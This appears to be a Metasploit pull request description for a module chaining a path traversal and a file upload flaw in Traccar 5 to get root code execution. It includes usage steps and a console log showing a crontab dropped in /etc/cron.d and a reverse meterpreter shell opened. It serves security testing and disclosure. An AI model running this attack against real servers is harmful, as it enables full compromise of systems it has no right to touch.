rapid7/metasploit-framework
# Traccar 5 RCE (CVE-2024-31214 & CVE-2024-24809) Module

This is a new module which exploits two vulnerabilities in Traccar v5.1 - v5.12 to obtain remote code execution: A path traversal vulnerability (CVE-2024-24809) and an unrestricted file upload vulnerability (CVE-2024-31214). By default, the application allows self-registration, enabling any user to register an account and exploit the issues. Moreover, the application runs by default with root privileges, potentially resulting in a complete system compromise.
This module, which should work on any Red Hat-based Linux system, exploits these issues by adding a new cronjob file that executes the specified payload.

## Verification Steps

1. Download the application from the [vendor](https://github.com/traccar/traccar/releases/download/v5.12/traccar-linux-64-5.12.zip).
2. Deploy it by following the vendor's [installation guide](https://www.traccar.org/linux/).
3. Start `msfconsole`
4. `use exploit/linux/http/traccar_rce_upload`
5. `set RHOSTS <IP>`
6. `set LHOST<IP>`
7. `exploit`

A new crontab file should have been written to `/etc/cron.d/` that executes the specified fetch command to get you a meterpreter session in the context of `root`.

```
msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.138:58196) at 2024-08-25 17:03:02 -0400
[*] Exploit finished, check thy shell.

meterpreter > sysinfo 
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.13.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: root
```

**Successfully tested on**

- Traccar v5.12 on Rocky Linux 9.4
- Traccar v5.11 on Rocky Linux 9.4

**Notes**
At the end, I've added a one minute sleep command, as otherwise the handler might terminate before the cronjob got executed and meterpreter session established. 

```Ruby
    print_status('Cronjob successfully written - waiting for execution...')
    sleep(60)
```

Not sure if there is a proper MSF way to handle this except for running a handler as a standalone instance?
